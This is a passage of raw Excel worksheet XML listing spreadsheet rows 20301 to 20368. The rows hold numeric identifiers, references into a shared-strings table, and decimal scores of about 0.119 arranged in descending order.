      <c r="B20301" s="2">
        <v>2.3589116E7</v>
      </c>
      <c r="C20301" s="2" t="s">
        <v>19578</v>
      </c>
      <c r="D20301" s="2">
        <v>1.0</v>
      </c>
      <c r="E20301" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20301" s="2">
        <v>0.1197318007662835</v>
      </c>
    </row>
    <row r="20302" ht="15.75" customHeight="1">
      <c r="A20302" s="1">
        <v>10088.0</v>
      </c>
      <c r="B20302" s="2">
        <v>5.7171987E7</v>
      </c>
      <c r="C20302" s="2" t="s">
        <v>19579</v>
      </c>
      <c r="D20302" s="2">
        <v>1.0</v>
      </c>
      <c r="E20302" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20302" s="2">
        <v>0.1197318007662835</v>
      </c>
    </row>
    <row r="20303" ht="15.75" customHeight="1">
      <c r="A20303" s="1">
        <v>10378.0</v>
      </c>
      <c r="B20303" s="2">
        <v>7986508.0</v>
      </c>
      <c r="C20303" s="2" t="s">
        <v>19580</v>
      </c>
      <c r="D20303" s="2">
        <v>1.0</v>
      </c>
      <c r="E20303" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20303" s="2">
        <v>0.1197318007662835</v>
      </c>
    </row>
    <row r="20304" ht="15.75" customHeight="1">
      <c r="A20304" s="1">
        <v>18778.0</v>
      </c>
      <c r="B20304" s="2">
        <v>5.3805931E7</v>
      </c>
      <c r="C20304" s="2" t="s">
        <v>19581</v>
      </c>
      <c r="D20304" s="2">
        <v>1.0</v>
      </c>
      <c r="E20304" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20304" s="2">
        <v>0.1197318007662835</v>
      </c>
    </row>
    <row r="20305" ht="15.75" customHeight="1">
      <c r="A20305" s="1">
        <v>28152.0</v>
      </c>
      <c r="B20305" s="2">
        <v>2.4834353E7</v>
      </c>
      <c r="C20305" s="2" t="s">
        <v>19582</v>
      </c>
      <c r="D20305" s="2">
        <v>1.0</v>
      </c>
      <c r="E20305" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20305" s="2">
        <v>0.1197318007662835</v>
      </c>
    </row>
    <row r="20306" ht="15.75" customHeight="1">
      <c r="A20306" s="1">
        <v>1301.0</v>
      </c>
      <c r="B20306" s="2">
        <v>2.5657743E7</v>
      </c>
      <c r="C20306" s="2" t="s">
        <v>19583</v>
      </c>
      <c r="D20306" s="2">
        <v>1.0</v>
      </c>
      <c r="E20306" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20306" s="2">
        <v>0.1195856873822976</v>
      </c>
    </row>
    <row r="20307" ht="15.75" customHeight="1">
      <c r="A20307" s="1">
        <v>4097.0</v>
      </c>
      <c r="B20307" s="2">
        <v>4.1283069E7</v>
      </c>
      <c r="C20307" s="2" t="s">
        <v>19584</v>
      </c>
      <c r="D20307" s="2">
        <v>1.0</v>
      </c>
      <c r="E20307" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20307" s="2">
        <v>0.1195856873822976</v>
      </c>
    </row>
    <row r="20308" ht="15.75" customHeight="1">
      <c r="A20308" s="1">
        <v>8345.0</v>
      </c>
      <c r="B20308" s="2">
        <v>5.3724393E7</v>
      </c>
      <c r="C20308" s="2" t="s">
        <v>19585</v>
      </c>
      <c r="D20308" s="2">
        <v>1.0</v>
      </c>
      <c r="E20308" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20308" s="2">
        <v>0.1195856873822976</v>
      </c>
    </row>
    <row r="20309" ht="15.75" customHeight="1">
      <c r="A20309" s="1">
        <v>13335.0</v>
      </c>
      <c r="B20309" s="2">
        <v>3.46604E7</v>
      </c>
      <c r="C20309" s="2" t="s">
        <v>19586</v>
      </c>
      <c r="D20309" s="2">
        <v>1.0</v>
      </c>
      <c r="E20309" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20309" s="2">
        <v>0.1195856873822976</v>
      </c>
    </row>
    <row r="20310" ht="15.75" customHeight="1">
      <c r="A20310" s="1">
        <v>11449.0</v>
      </c>
      <c r="B20310" s="2">
        <v>2.1775735E7</v>
      </c>
      <c r="C20310" s="2" t="s">
        <v>19587</v>
      </c>
      <c r="D20310" s="2">
        <v>1.0</v>
      </c>
      <c r="E20310" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20310" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="20311" ht="15.75" customHeight="1">
      <c r="A20311" s="1">
        <v>16719.0</v>
      </c>
      <c r="B20311" s="2">
        <v>4.7461432E7</v>
      </c>
      <c r="C20311" s="2" t="s">
        <v>19588</v>
      </c>
      <c r="D20311" s="2">
        <v>1.0</v>
      </c>
      <c r="E20311" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20311" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="20312" ht="15.75" customHeight="1">
      <c r="A20312" s="1">
        <v>22602.0</v>
      </c>
      <c r="B20312" s="2">
        <v>3.9523787E7</v>
      </c>
      <c r="C20312" s="2" t="s">
        <v>19589</v>
      </c>
      <c r="D20312" s="2">
        <v>1.0</v>
      </c>
      <c r="E20312" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20312" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="20313" ht="15.75" customHeight="1">
      <c r="A20313" s="1">
        <v>6071.0</v>
      </c>
      <c r="B20313" s="2">
        <v>4.7625834E7</v>
      </c>
      <c r="C20313" s="2" t="s">
        <v>19590</v>
      </c>
      <c r="D20313" s="2">
        <v>1.0</v>
      </c>
      <c r="E20313" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20313" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="20314" ht="15.75" customHeight="1">
      <c r="A20314" s="1">
        <v>12581.0</v>
      </c>
      <c r="B20314" s="2">
        <v>3.0018312E7</v>
      </c>
      <c r="C20314" s="2" t="s">
        <v>19591</v>
      </c>
      <c r="D20314" s="2">
        <v>1.0</v>
      </c>
      <c r="E20314" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20314" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="20315" ht="15.75" customHeight="1">
      <c r="A20315" s="1">
        <v>17351.0</v>
      </c>
      <c r="B20315" s="2">
        <v>4.9424886E7</v>
      </c>
      <c r="C20315" s="2" t="s">
        <v>19592</v>
      </c>
      <c r="D20315" s="2">
        <v>1.0</v>
      </c>
      <c r="E20315" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20315" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="20316" ht="15.75" customHeight="1">
      <c r="A20316" s="1">
        <v>18217.0</v>
      </c>
      <c r="B20316" s="2">
        <v>5.2079926E7</v>
      </c>
      <c r="C20316" s="2" t="s">
        <v>19593</v>
      </c>
      <c r="D20316" s="2">
        <v>1.0</v>
      </c>
      <c r="E20316" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20316" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="20317" ht="15.75" customHeight="1">
      <c r="A20317" s="1">
        <v>25651.0</v>
      </c>
      <c r="B20317" s="2">
        <v>1.452297E7</v>
      </c>
      <c r="C20317" s="2" t="s">
        <v>19594</v>
      </c>
      <c r="D20317" s="2">
        <v>1.0</v>
      </c>
      <c r="E20317" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20317" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="20318" ht="15.75" customHeight="1">
      <c r="A20318" s="1">
        <v>28219.0</v>
      </c>
      <c r="B20318" s="2">
        <v>2.5055694E7</v>
      </c>
      <c r="C20318" s="2" t="s">
        <v>19595</v>
      </c>
      <c r="D20318" s="2">
        <v>1.0</v>
      </c>
      <c r="E20318" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20318" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="20319" ht="15.75" customHeight="1">
      <c r="A20319" s="1">
        <v>28731.0</v>
      </c>
      <c r="B20319" s="2">
        <v>2.7976183E7</v>
      </c>
      <c r="C20319" s="2" t="s">
        <v>19596</v>
      </c>
      <c r="D20319" s="2">
        <v>1.0</v>
      </c>
      <c r="E20319" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20319" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="20320" ht="15.75" customHeight="1">
      <c r="A20320" s="1">
        <v>32382.0</v>
      </c>
      <c r="B20320" s="2">
        <v>5612215.0</v>
      </c>
      <c r="C20320" s="2" t="s">
        <v>19597</v>
      </c>
      <c r="D20320" s="2">
        <v>1.0</v>
      </c>
      <c r="E20320" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20320" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="20321" ht="15.75" customHeight="1">
      <c r="A20321" s="1">
        <v>3776.0</v>
      </c>
      <c r="B20321" s="2">
        <v>3.9880271E7</v>
      </c>
      <c r="C20321" s="2" t="s">
        <v>19598</v>
      </c>
      <c r="D20321" s="2">
        <v>1.0</v>
      </c>
      <c r="E20321" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20321" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="20322" ht="15.75" customHeight="1">
      <c r="A20322" s="1">
        <v>4190.0</v>
      </c>
      <c r="B20322" s="2">
        <v>4.1576079E7</v>
      </c>
      <c r="C20322" s="2" t="s">
        <v>19599</v>
      </c>
      <c r="D20322" s="2">
        <v>1.0</v>
      </c>
      <c r="E20322" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20322" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="20323" ht="15.75" customHeight="1">
      <c r="A20323" s="1">
        <v>4849.0</v>
      </c>
      <c r="B20323" s="2">
        <v>4.3716937E7</v>
      </c>
      <c r="C20323" s="2" t="s">
        <v>19600</v>
      </c>
      <c r="D20323" s="2">
        <v>1.0</v>
      </c>
      <c r="E20323" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20323" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="20324" ht="15.75" customHeight="1">
      <c r="A20324" s="1">
        <v>6879.0</v>
      </c>
      <c r="B20324" s="2">
        <v>4.9722384E7</v>
      </c>
      <c r="C20324" s="2" t="s">
        <v>19601</v>
      </c>
      <c r="D20324" s="2">
        <v>1.0</v>
      </c>
      <c r="E20324" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20324" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="20325" ht="15.75" customHeight="1">
      <c r="A20325" s="1">
        <v>9393.0</v>
      </c>
      <c r="B20325" s="2">
        <v>5.5743421E7</v>
      </c>
      <c r="C20325" s="2" t="s">
        <v>19602</v>
      </c>
      <c r="D20325" s="2">
        <v>1.0</v>
      </c>
      <c r="E20325" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20325" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="20326" ht="15.75" customHeight="1">
      <c r="A20326" s="1">
        <v>10011.0</v>
      </c>
      <c r="B20326" s="2">
        <v>5.7019245E7</v>
      </c>
      <c r="C20326" s="2" t="s">
        <v>19603</v>
      </c>
      <c r="D20326" s="2">
        <v>1.0</v>
      </c>
      <c r="E20326" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20326" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="20327" ht="15.75" customHeight="1">
      <c r="A20327" s="1">
        <v>10217.0</v>
      </c>
      <c r="B20327" s="2">
        <v>5.7447964E7</v>
      </c>
      <c r="C20327" s="2" t="s">
        <v>19604</v>
      </c>
      <c r="D20327" s="2">
        <v>1.0</v>
      </c>
      <c r="E20327" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20327" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="20328" ht="15.75" customHeight="1">
      <c r="A20328" s="1">
        <v>11402.0</v>
      </c>
      <c r="B20328" s="2">
        <v>2.1608305E7</v>
      </c>
      <c r="C20328" s="2" t="s">
        <v>19605</v>
      </c>
      <c r="D20328" s="2">
        <v>1.0</v>
      </c>
      <c r="E20328" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20328" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="20329" ht="15.75" customHeight="1">
      <c r="A20329" s="1">
        <v>14507.0</v>
      </c>
      <c r="B20329" s="2">
        <v>3.9703335E7</v>
      </c>
      <c r="C20329" s="6" t="s">
        <v>19606</v>
      </c>
      <c r="D20329" s="2">
        <v>1.0</v>
      </c>
      <c r="E20329" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20329" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="20330" ht="15.75" customHeight="1">
      <c r="A20330" s="1">
        <v>19155.0</v>
      </c>
      <c r="B20330" s="2">
        <v>5.4885727E7</v>
      </c>
      <c r="C20330" s="2" t="s">
        <v>19607</v>
      </c>
      <c r="D20330" s="2">
        <v>1.0</v>
      </c>
      <c r="E20330" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20330" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="20331" ht="15.75" customHeight="1">
      <c r="A20331" s="1">
        <v>20965.0</v>
      </c>
      <c r="B20331" s="2">
        <v>1.6763723E7</v>
      </c>
      <c r="C20331" s="2" t="s">
        <v>19608</v>
      </c>
      <c r="D20331" s="2">
        <v>1.0</v>
      </c>
      <c r="E20331" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20331" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="20332" ht="15.75" customHeight="1">
      <c r="A20332" s="1">
        <v>24095.0</v>
      </c>
      <c r="B20332" s="2">
        <v>9799820.0</v>
      </c>
      <c r="C20332" s="2" t="s">
        <v>19609</v>
      </c>
      <c r="D20332" s="2">
        <v>1.0</v>
      </c>
      <c r="E20332" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20332" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="20333" ht="15.75" customHeight="1">
      <c r="A20333" s="1">
        <v>24230.0</v>
      </c>
      <c r="B20333" s="2">
        <v>1.0455971E7</v>
      </c>
      <c r="C20333" s="2" t="s">
        <v>19610</v>
      </c>
      <c r="D20333" s="2">
        <v>1.0</v>
      </c>
      <c r="E20333" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20333" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="20334" ht="15.75" customHeight="1">
      <c r="A20334" s="1">
        <v>24660.0</v>
      </c>
      <c r="B20334" s="2">
        <v>1.1522125E7</v>
      </c>
      <c r="C20334" s="2" t="s">
        <v>19611</v>
      </c>
      <c r="D20334" s="2">
        <v>1.0</v>
      </c>
      <c r="E20334" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20334" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="20335" ht="15.75" customHeight="1">
      <c r="A20335" s="1">
        <v>26257.0</v>
      </c>
      <c r="B20335" s="2">
        <v>1.6346601E7</v>
      </c>
      <c r="C20335" s="2" t="s">
        <v>19612</v>
      </c>
      <c r="D20335" s="2">
        <v>1.0</v>
      </c>
      <c r="E20335" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20335" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="20336" ht="15.75" customHeight="1">
      <c r="A20336" s="1">
        <v>32900.0</v>
      </c>
      <c r="B20336" s="2">
        <v>6395523.0</v>
      </c>
      <c r="C20336" s="2" t="s">
        <v>19613</v>
      </c>
      <c r="D20336" s="2">
        <v>1.0</v>
      </c>
      <c r="E20336" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20336" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="20337" ht="15.75" customHeight="1">
      <c r="A20337" s="1">
        <v>12040.0</v>
      </c>
      <c r="B20337" s="2">
        <v>2.6311571E7</v>
      </c>
      <c r="C20337" s="2" t="s">
        <v>19614</v>
      </c>
      <c r="D20337" s="2">
        <v>1.0</v>
      </c>
      <c r="E20337" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20337" s="2">
        <v>0.1193078324225865</v>
      </c>
    </row>
    <row r="20338" ht="15.75" customHeight="1">
      <c r="A20338" s="1">
        <v>31174.0</v>
      </c>
      <c r="B20338" s="2">
        <v>4913043.0</v>
      </c>
      <c r="C20338" s="2" t="s">
        <v>19615</v>
      </c>
      <c r="D20338" s="2">
        <v>1.0</v>
      </c>
      <c r="E20338" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20338" s="2">
        <v>0.1193078324225865</v>
      </c>
    </row>
    <row r="20339" ht="15.75" customHeight="1">
      <c r="A20339" s="1">
        <v>34008.0</v>
      </c>
      <c r="B20339" s="2">
        <v>9497790.0</v>
      </c>
      <c r="C20339" s="2" t="s">
        <v>19616</v>
      </c>
      <c r="D20339" s="2">
        <v>1.0</v>
      </c>
      <c r="E20339" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20339" s="2">
        <v>0.1193078324225865</v>
      </c>
    </row>
    <row r="20340" ht="15.75" customHeight="1">
      <c r="A20340" s="1">
        <v>28422.0</v>
      </c>
      <c r="B20340" s="2">
        <v>2.6401302E7</v>
      </c>
      <c r="C20340" s="2" t="s">
        <v>19617</v>
      </c>
      <c r="D20340" s="2">
        <v>1.0</v>
      </c>
      <c r="E20340" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20340" s="2">
        <v>0.1190476190476191</v>
      </c>
    </row>
    <row r="20341" ht="15.75" customHeight="1">
      <c r="A20341" s="1">
        <v>2732.0</v>
      </c>
      <c r="B20341" s="2">
        <v>3.4987995E7</v>
      </c>
      <c r="C20341" s="2" t="s">
        <v>19618</v>
      </c>
      <c r="D20341" s="2">
        <v>1.0</v>
      </c>
      <c r="E20341" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20341" s="2">
        <v>0.1189236111111111</v>
      </c>
    </row>
    <row r="20342" ht="15.75" customHeight="1">
      <c r="A20342" s="1">
        <v>6684.0</v>
      </c>
      <c r="B20342" s="2">
        <v>4.9179039E7</v>
      </c>
      <c r="C20342" s="2" t="s">
        <v>19619</v>
      </c>
      <c r="D20342" s="2">
        <v>1.0</v>
      </c>
      <c r="E20342" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20342" s="2">
        <v>0.1189236111111111</v>
      </c>
    </row>
    <row r="20343" ht="15.75" customHeight="1">
      <c r="A20343" s="1">
        <v>19647.0</v>
      </c>
      <c r="B20343" s="2">
        <v>5.6305632E7</v>
      </c>
      <c r="C20343" s="2" t="s">
        <v>19620</v>
      </c>
      <c r="D20343" s="2">
        <v>1.0</v>
      </c>
      <c r="E20343" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20343" s="2">
        <v>0.1189236111111111</v>
      </c>
    </row>
    <row r="20344" ht="15.75" customHeight="1">
      <c r="A20344" s="1">
        <v>13898.0</v>
      </c>
      <c r="B20344" s="2">
        <v>3.703677E7</v>
      </c>
      <c r="C20344" s="2" t="s">
        <v>19621</v>
      </c>
      <c r="D20344" s="2">
        <v>1.0</v>
      </c>
      <c r="E20344" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20344" s="2">
        <v>0.1188034188034188</v>
      </c>
    </row>
    <row r="20345" ht="15.75" customHeight="1">
      <c r="A20345" s="1">
        <v>19093.0</v>
      </c>
      <c r="B20345" s="2">
        <v>5.4671938E7</v>
      </c>
      <c r="C20345" s="2" t="s">
        <v>19622</v>
      </c>
      <c r="D20345" s="2">
        <v>1.0</v>
      </c>
      <c r="E20345" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20345" s="2">
        <v>0.1188034188034188</v>
      </c>
    </row>
    <row r="20346" ht="15.75" customHeight="1">
      <c r="A20346" s="1">
        <v>682.0</v>
      </c>
      <c r="B20346" s="2">
        <v>2.0300334E7</v>
      </c>
      <c r="C20346" s="2" t="s">
        <v>19623</v>
      </c>
      <c r="D20346" s="2">
        <v>1.0</v>
      </c>
      <c r="E20346" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20346" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="20347" ht="15.75" customHeight="1">
      <c r="A20347" s="1">
        <v>696.0</v>
      </c>
      <c r="B20347" s="2">
        <v>2.0438688E7</v>
      </c>
      <c r="C20347" s="2" t="s">
        <v>19624</v>
      </c>
      <c r="D20347" s="2">
        <v>1.0</v>
      </c>
      <c r="E20347" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20347" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="20348" ht="15.75" customHeight="1">
      <c r="A20348" s="1">
        <v>1246.0</v>
      </c>
      <c r="B20348" s="2">
        <v>2.5110635E7</v>
      </c>
      <c r="C20348" s="2" t="s">
        <v>19625</v>
      </c>
      <c r="D20348" s="2">
        <v>1.0</v>
      </c>
      <c r="E20348" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20348" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="20349" ht="15.75" customHeight="1">
      <c r="A20349" s="1">
        <v>1673.0</v>
      </c>
      <c r="B20349" s="2">
        <v>2.8323412E7</v>
      </c>
      <c r="C20349" s="2" t="s">
        <v>19626</v>
      </c>
      <c r="D20349" s="2">
        <v>1.0</v>
      </c>
      <c r="E20349" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20349" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="20350" ht="15.75" customHeight="1">
      <c r="A20350" s="1">
        <v>1731.0</v>
      </c>
      <c r="B20350" s="2">
        <v>2.8750681E7</v>
      </c>
      <c r="C20350" s="2" t="s">
        <v>19627</v>
      </c>
      <c r="D20350" s="2">
        <v>1.0</v>
      </c>
      <c r="E20350" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20350" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="20351" ht="15.75" customHeight="1">
      <c r="A20351" s="1">
        <v>2082.0</v>
      </c>
      <c r="B20351" s="2">
        <v>3.1169044E7</v>
      </c>
      <c r="C20351" s="2" t="s">
        <v>19628</v>
      </c>
      <c r="D20351" s="2">
        <v>1.0</v>
      </c>
      <c r="E20351" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20351" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="20352" ht="15.75" customHeight="1">
      <c r="A20352" s="1">
        <v>2443.0</v>
      </c>
      <c r="B20352" s="2">
        <v>3.3701507E7</v>
      </c>
      <c r="C20352" s="2" t="s">
        <v>19629</v>
      </c>
      <c r="D20352" s="2">
        <v>1.0</v>
      </c>
      <c r="E20352" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20352" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="20353" ht="15.75" customHeight="1">
      <c r="A20353" s="1">
        <v>2652.0</v>
      </c>
      <c r="B20353" s="2">
        <v>3.4679997E7</v>
      </c>
      <c r="C20353" s="2" t="s">
        <v>19630</v>
      </c>
      <c r="D20353" s="2">
        <v>1.0</v>
      </c>
      <c r="E20353" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20353" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="20354" ht="15.75" customHeight="1">
      <c r="A20354" s="1">
        <v>4110.0</v>
      </c>
      <c r="B20354" s="2">
        <v>4.1337381E7</v>
      </c>
      <c r="C20354" s="2" t="s">
        <v>19631</v>
      </c>
      <c r="D20354" s="2">
        <v>1.0</v>
      </c>
      <c r="E20354" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20354" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="20355" ht="15.75" customHeight="1">
      <c r="A20355" s="1">
        <v>4118.0</v>
      </c>
      <c r="B20355" s="2">
        <v>4.1354792E7</v>
      </c>
      <c r="C20355" s="2" t="s">
        <v>19632</v>
      </c>
      <c r="D20355" s="2">
        <v>1.0</v>
      </c>
      <c r="E20355" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20355" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="20356" ht="15.75" customHeight="1">
      <c r="A20356" s="1">
        <v>4288.0</v>
      </c>
      <c r="B20356" s="2">
        <v>4.1904546E7</v>
      </c>
      <c r="C20356" s="2" t="s">
        <v>19633</v>
      </c>
      <c r="D20356" s="2">
        <v>1.0</v>
      </c>
      <c r="E20356" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20356" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="20357" ht="15.75" customHeight="1">
      <c r="A20357" s="1">
        <v>4777.0</v>
      </c>
      <c r="B20357" s="2">
        <v>4.3438979E7</v>
      </c>
      <c r="C20357" s="2" t="s">
        <v>19634</v>
      </c>
      <c r="D20357" s="2">
        <v>1.0</v>
      </c>
      <c r="E20357" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20357" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="20358" ht="15.75" customHeight="1">
      <c r="A20358" s="1">
        <v>4851.0</v>
      </c>
      <c r="B20358" s="2">
        <v>4.3738412E7</v>
      </c>
      <c r="C20358" s="2" t="s">
        <v>19635</v>
      </c>
      <c r="D20358" s="2">
        <v>1.0</v>
      </c>
      <c r="E20358" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20358" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="20359" ht="15.75" customHeight="1">
      <c r="A20359" s="1">
        <v>5429.0</v>
      </c>
      <c r="B20359" s="2">
        <v>4.5572826E7</v>
      </c>
      <c r="C20359" s="2" t="s">
        <v>19636</v>
      </c>
      <c r="D20359" s="2">
        <v>1.0</v>
      </c>
      <c r="E20359" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20359" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="20360" ht="15.75" customHeight="1">
      <c r="A20360" s="1">
        <v>7170.0</v>
      </c>
      <c r="B20360" s="2">
        <v>5.0525387E7</v>
      </c>
      <c r="C20360" s="2" t="s">
        <v>19637</v>
      </c>
      <c r="D20360" s="2">
        <v>1.0</v>
      </c>
      <c r="E20360" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20360" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="20361" ht="15.75" customHeight="1">
      <c r="A20361" s="1">
        <v>8395.0</v>
      </c>
      <c r="B20361" s="2">
        <v>5.3856019E7</v>
      </c>
      <c r="C20361" s="2" t="s">
        <v>19638</v>
      </c>
      <c r="D20361" s="2">
        <v>1.0</v>
      </c>
      <c r="E20361" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20361" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="20362" ht="15.75" customHeight="1">
      <c r="A20362" s="1">
        <v>8582.0</v>
      </c>
      <c r="B20362" s="2">
        <v>5.42225E7</v>
      </c>
      <c r="C20362" s="2" t="s">
        <v>19639</v>
      </c>
      <c r="D20362" s="2">
        <v>1.0</v>
      </c>
      <c r="E20362" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20362" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="20363" ht="15.75" customHeight="1">
      <c r="A20363" s="1">
        <v>8731.0</v>
      </c>
      <c r="B20363" s="2">
        <v>5.4520932E7</v>
      </c>
      <c r="C20363" s="2" t="s">
        <v>19640</v>
      </c>
      <c r="D20363" s="2">
        <v>1.0</v>
      </c>
      <c r="E20363" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20363" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="20364" ht="15.75" customHeight="1">
      <c r="A20364" s="1">
        <v>10347.0</v>
      </c>
      <c r="B20364" s="2">
        <v>5.7737024E7</v>
      </c>
      <c r="C20364" s="2" t="s">
        <v>19641</v>
      </c>
      <c r="D20364" s="2">
        <v>1.0</v>
      </c>
      <c r="E20364" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20364" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="20365" ht="15.75" customHeight="1">
      <c r="A20365" s="1">
        <v>11062.0</v>
      </c>
      <c r="B20365" s="2">
        <v>1.8253598E7</v>
      </c>
      <c r="C20365" s="2" t="s">
        <v>19642</v>
      </c>
      <c r="D20365" s="2">
        <v>1.0</v>
      </c>
      <c r="E20365" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20365" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="20366" ht="15.75" customHeight="1">
      <c r="A20366" s="1">
        <v>11430.0</v>
      </c>
      <c r="B20366" s="2">
        <v>2.1748195E7</v>
      </c>
      <c r="C20366" s="5" t="s">
        <v>19643</v>
      </c>
      <c r="D20366" s="2">
        <v>1.0</v>
      </c>
      <c r="E20366" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20366" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="20367" ht="15.75" customHeight="1">
      <c r="A20367" s="1">
        <v>11431.0</v>
      </c>
      <c r="B20367" s="2">
        <v>2.1748195E7</v>
      </c>
      <c r="C20367" s="2" t="s">
        <v>19644</v>
      </c>
      <c r="D20367" s="2">
        <v>1.0</v>
      </c>
      <c r="E20367" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20367" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="20368" ht="15.75" customHeight="1">
      <c r="A20368" s="1">
        <v>11730.0</v>
      </c>
